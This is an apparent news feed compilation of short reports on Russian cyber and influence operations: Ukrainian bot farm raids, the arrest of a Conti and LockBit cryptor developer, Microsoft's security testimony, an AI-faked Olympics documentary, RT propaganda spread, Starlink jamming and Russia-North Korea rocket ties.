Russia has used bot farms to disseminate Kremlin propaganda, incite panic and manipulate narratives since the beginning of its Ukrainian invasion. The Ukrainian authorities have busted dozens of bot farms and arrested hundreds of people across the country who operate them. In December 2022, they dismantled more than a dozen bot farms. In September of that year, two bot farms were taken down, while in August a group that operated more than 1 million bots was also dismantled. Bot farm operators typically receive payments in Russian rubles, a prohibited currency in Ukraine. These activities continued in the second year of the war, where the Ukrainian Cyber Police raided 21 locations across the country and seized computer equipment, mobile phones and more than 250 GSM gateways. This included 150,000 SIM cards of different mobile operators used in the illicit activities to create fake social media profiles.

Microsoft in damage-control mode, says it will prioritize security over AI

Brad Smith, vice chairman and president of Microsoft, is sworn in before testifying about Microsoft's cybersecurity work during a House Committee on Homeland Security hearing on Capitol Hill in Washington, DC, on June 13, 2024. (credit: SAUL LOEB / Contributor | AFP)

Microsoft is pivoting its company culture to make security a top priority, President Brad Smith testified to Congress on Thursday, promising that security will be "more important even than the company’s work on artificial intelligence."

Satya Nadella, Microsoft's CEO, "has taken on the responsibility personally to serve as the senior executive with overall accountability for Microsoft’s security," Smith told Congress.

His testimony comes after Microsoft admitted that it could have taken steps to prevent two aggressive nation-state cyberattacks from China and Russia.

Ukraine National Police Arrest Conti and LockBit Ransomware Cryptor Developer

Ukraine National Police have arrested a man they say helped disguise ransomware used by Russia-based threat groups. The 28-year-old cryptor developer was unnamed in Ukraine and Netherlands announcements of the arrest, but the Dutch statement said he was arrested on April 18, 2024 in a lead-up to May’s massive “Operation Endgame” botnet takedown.

Cryptor Developer Worked with Conti, LockBit

Ukraine cyber police and National Police investigators say they established that the man was involved in the LockBit and Conti ransomware groups. The Kyiv man infected a company in the Netherlands with Conti ransomware in 2021, demanded a ransom and threatened to release confidential company information if payment wasn’t made, according to the Dutch announcement, which cited work by the Netherlands’ High Tech Crime Team of the National Operations and Interventions Unit and the National Public Prosecution Service. They requested Ukraine’s assistance in the case as part of their investigation.

As part of the arrest, Ukrainian police conducted house searches in the city of Kyiv and the Kharkiv region on April 18 and seized computer equipment, mobile phones and documents for further investigation (pictured below).

Image: Items seized in Ukraine ransomware arrest

The Ukraine cyber police said the man “specialized in the development of cryptors,” or “special software for masking computer viruses under the guise of safe files” (quotes translated from the Ukraine statement). “Thanks to his programming skills, the person involved was able to hide malicious software from the most popular antiviruses,” the Ukraine statement added.

LockBit Remains Active Despite Repeated Enforcement Activities

The Conti ransomware group reportedly dissolved in 2022 after a Ukrainian researcher leaked the group's source code in retaliation for the group's support of Russia's invasion of Ukraine, but LockBit has remained persistent. Despite the Ukraine arrest and law enforcement successes like Operation Endgame, Operation Cronos, and the unmasking of formerly anonymous LockBit leader Dmitry Khoroshev, LockBit has shown an ability to continually regroup and reestablish threat activities, recently launching high-profile ransomware attacks such as one that the city of Wichita is finally recovering from.

Ukraine officials said the investigation is ongoing. The suspect is being charged under part 5 of Article 361, Unauthorized interference in the work of information (automated), electronic communication, information and communication systems, electronic communication networks, of the Criminal Code of Ukraine. The article provides for punishment of up to 15 years of imprisonment, and additional charges are possible. Netherlands officials thanked the Ukrainian investigators for their assistance and said they “are very pleased with the arrest in Ukraine and are grateful for the space that the Ukrainian police have found for this in times of war.”

Let’s unpack some questions about Russia’s role in North Korea’s rocket program

In this pool photo distributed by Sputnik agency, Russia's President Vladimir Putin and North Korea's leader Kim Jong Un visit the Vostochny Cosmodrome in Amur region in 2023. An RD-191 engine is visible in the background. (credit: Vladimir Smirnov/Pool/AFP/Getty Images)

Russian President Vladimir Putin will reportedly visit North Korea later this month, and you can bet collaboration on missiles and space programs will be on the agenda.

The bilateral summit in Pyongyang will follow a mysterious North Korean rocket launch on May 27, which ended in a fireball over the Yellow Sea. The fact that this launch fell short of orbit is not unusual—two of the country's three previous satellite launch attempts failed. But North Korea's official state news agency dropped some big news in the last paragraph of its report on the May 27 launch.

The Korean Central News Agency called the launch vehicle a "new-type satellite carrier rocket" and attributed the likely cause of the failure to "the reliability of operation of the newly developed liquid oxygen + petroleum engine" on the first stage booster. A small North Korean military spy satellite was destroyed. The fiery demise of the North Korean rocket was captured in a video recorded by the Japanese news broadcaster NHK.

Russian agents deploy AI-produced Tom Cruise narrator to tar Summer Olympics

A visual from the fake documentary Olympics Has Fallen produced by Russia-affiliated influence actor Storm-1679. (credit: Microsoft)

Last year, a feature-length documentary purportedly produced by Netflix began circulating on Telegram. Titled “Olympics have Fallen” and narrated by a voice with a striking similarity to that of actor Tom Cruise, it sharply criticized the leadership of the International Olympic Committee. The slickly produced film, claiming five-star reviews from The New York Times, Washington Post, and BBC, was quickly amplified on social media. Among those seemingly endorsing the documentary were celebrities on the platform Cameo.

A recently published report by Microsoft (PDF) said the film was not a documentary, had received no such reviews, and that the narrator's voice was an AI-produced deep fake of Cruise. It also said the endorsements on Cameo were faked. The Microsoft Threat Intelligence Report went on to say that the fraudulent documentary and endorsements were only one of many elaborate hoaxes created by agents of the Russian government in a yearlong influence operation intended to discredit the International Olympic Committee (IOC) and deter participation and attendance at the Paris Olympics starting next month.

Other examples of the Kremlin’s ongoing influence operation include:

Exclusive: The Guardian interviews President Zelenskiy

In an exclusive interview with the Guardian, the Ukrainian president, Volodymyr Zelenskiy, revealed the tactics and traits that help him face the daily frustrations of leading a country at war for more than two years.

Within a ceremonial room inside Kyiv’s presidential compound, Zelenskiy spoke for nearly an hour with a Guardian team, including the editor-in-chief, Katharine Viner. The interview took place during perhaps the toughest time for Ukraine since the early days of the war. Russia is on the offensive in Kharkiv, an advance that follows months of delay in the US Congress over the passing of a major support package, limiting Ukraine’s battlefield capabilities

© Photograph: The Guardian

Europe Banned Russia’s RT Network. Its Content Is Still Spreading.

A study found that hundreds of sites, many without obvious Kremlin links, copied Russian propaganda and spread it to unsuspecting audiences ahead of the E.U. election.

© Misha Friedman/Getty Images

RT, which the U.S. State Department describes as a key player in the Kremlin’s disinformation and propaganda apparatus, has been banned in the European Union, Canada and other countries since Russia invaded Ukraine in 2022.

Once a Sheriff’s Deputy in Florida, Now a Source of Disinformation From Russia

In 2016, Russia used an army of trolls to interfere in the U.S. presidential election. This year, an American given asylum in Moscow may be accomplishing much the same thing all by himself.

© Alexander Zemlianichenko/Associated Press

John Mark Dougan, who has been granted asylum in Moscow, above, has become a key player in the Kremlin’s information operations against the West.

Russia Is Increasingly Blocking Ukraine’s Starlink Service

Russia has deployed advanced tech to interfere with Elon Musk’s satellite internet service, Ukrainian officials said, leading to more outages on the northern front battle line.

© Sasha Maslov for The New York Times

Members of the Achilles Drone battalion of Ukraine’s 92nd Assault Brigade in Kharkiv, Ukraine. They depend on Starlink service for communications and to conduct drone strikes.

Campus Protests Give Russia, China and Iran Fuel to Exploit U.S. Divide

America’s adversaries have mounted online campaigns to amplify the social and political conflicts over Gaza flaring at universities, researchers say.

© Amir Hamja/The New York Times

A protester with a Palestinian flag on a Columbia University building on Monday. So far, there is little evidence that U.S. adversaries have provided material or organizational support to the protests.